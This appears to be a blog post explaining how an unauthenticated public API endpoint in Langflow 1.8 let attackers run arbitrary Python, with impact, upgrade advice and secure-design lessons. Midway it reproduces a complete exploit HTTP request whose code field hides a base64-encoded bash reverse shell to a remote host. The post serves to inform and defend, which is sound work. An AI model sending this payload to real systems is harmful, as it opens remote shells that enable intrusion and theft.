Via news, we might already heard that Langflow – a startup that provides tools to build AI agents – got hacked, by the most critical vulnerability : Remote Code Execution. Here we dig deeper a little bit to understand how that happened.
Remote Code Execution (RCE) is rated as top severe cybersecurity flaw when it allows hackers to execute arbitrary code or commands on a exploited system. It means that hackers can steal every data, shut system down by will, or worser, encrypt all data and ask for a ransom. Some hackers simply just install crypto miners on exploited systems to earn Bitcoin or other crypto currencies. And in fact, Langflow was infected by a ransomware named JadePuff via that RCE flaw.
What is Langflow, firstly?
Langflow is an open-source project that provide a visual framework for building AI applications. Programmatically, instead of writing hundreds of lines of Python to connect LLMs, databases, APIs, and tools together, developers now can just drag and connect components in a graph – which is called a flow. Under the hood, Langflow generates and executes Python code. Langflow is designed to be self-hosted, so companies of all sizes can deploy it on their own servers rather than relying on a hosted service.
It means that, if your company is making AI agents using Langflow 1.8, you are having a RCE flaw and you need to fix that now!!!
How did Langflow get hacked ?
According to security researchers, Langflow 1.8 is hacked because it does not authenticate users properly. It sounds naive but it does happen in reality. Below is the patch from Langflow 1.9 that can fix this RCE flaw, if you have some coding experience, you can see how it happened:

Simply put, in Langflow 1.8, and lower versions, Langflow itself has an API that can receive any commands from any users, completely trust it and executes without any validations or restrictions.
More interesting, this endpoint does not require authentication because it is designed for public sharing. The problem is that this API accepted an optional data parameter supplied by the requester. Instead of always loading the trusted flow stored on the server, it could use the attacker-provided flow definition. That flow definition could include arbitrary Python code, which Langflow then executed using Python’s exec() without sandboxing.
Because the code executes with the privileges of the Langflow process, a successful attacker could potentially:
- Read environment variables (including API keys).
- Access files the Langflow process can read.
- Interact with internal services reachable by the server.
- Modify or delete application data.
- Install persistent malware or backdoors.
- Use stolen credentials to pivot into other systems.
The exact impact depends on how much privilege the Langflow server is configured and what secrets or network access it has.
This RCE flaw is being exploited in the wild as the time of this post. Cybercriminal gang has enough resource to scan for which company is exposing a Langflow API and then try installing malwares by simply sending a HTTP request with Python code inside it. The crafted HTTP request that exploit this RCE flaw can look like this: (take closely look at field “code” near “CustomComponent”)
POST /api/v1/build_public_tmp/${flow_id_here}/flow HTTP/1.1Host: localhost:7860Content-Type: application/jsonCookie: client_id=${client_id_here}Connection: closeContent-Length: 1846{ "data": { "nodes": [ { "id": "${flow_id_here}", "type": "genericNode", "position": { "x": 0, "y": 0 }, "data": { "type": "CustomComponent", "id": "${flow_id_here}", "node": { "template": { "_type": "CustomComponent", "code": { "value": "from langflow.custom import Component\nfrom langflow.io import Output\n_r = __import__('os').system(\"echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMi4xNzgvNDQ0NCAwPiYx | base64 -d | bash\")\nclass ExploitComponent(Component):\n display_name = \"ExploitComponent\"\n outputs = [Output(display_name=\"Result\", name=\"output\", method=\"run\")]\n def run(self) -> str: return \"ok\"", "type": "code", "required": true, "show": true, "name": "code", "dynamic": false, "list": false, "multiline": true } }, "description": "poc", "display_name": "ExploitComponent", "custom_fields": {}, "output_types": [ "str" ], "base_classes": [ "str" ], "outputs": [ { "display_name": "Result", "name": "output", "method": "run", "selected": "str", "types": [ "str" ], "value": "__UNDEFINED__" } ] } } } ], "edges": [], "viewport": { "x": 0, "y": 0, "zoom": 1 } }}
(Credit: above code is collected from this security lab: https://github.com/EQSTLab/CVE-2026-33017 )
How to patch this RCE flaw ?
The only way is to upgrade to Langflow latest versions as soon as possible!
Additionally, do not grant Langflow too much privilege (like “root” permission for example). The less privilege a service has, the less damages occur if it got hacked.
What can we learn from this incident ?
Sometime, the most critical security flaw does not come from high-skill exploiting, but from weak system design. Developers may not aware about bigger problem like Remote Code Execution because they do not have cybersecurity experience. Do not underestimate users because not every users is good people, some of them are paid for hacking. This again highlights several common secure-design principles:
- Never trust user’s input, system must validate inputs seriously.
- Beware with
exec(), only use it in isolated sandbox. - Run services with least privilege, so in worst case, hacked services do not cause critical damages.
Learn coding helps you build system, read The-Tech-Lead.com helps you protect it!
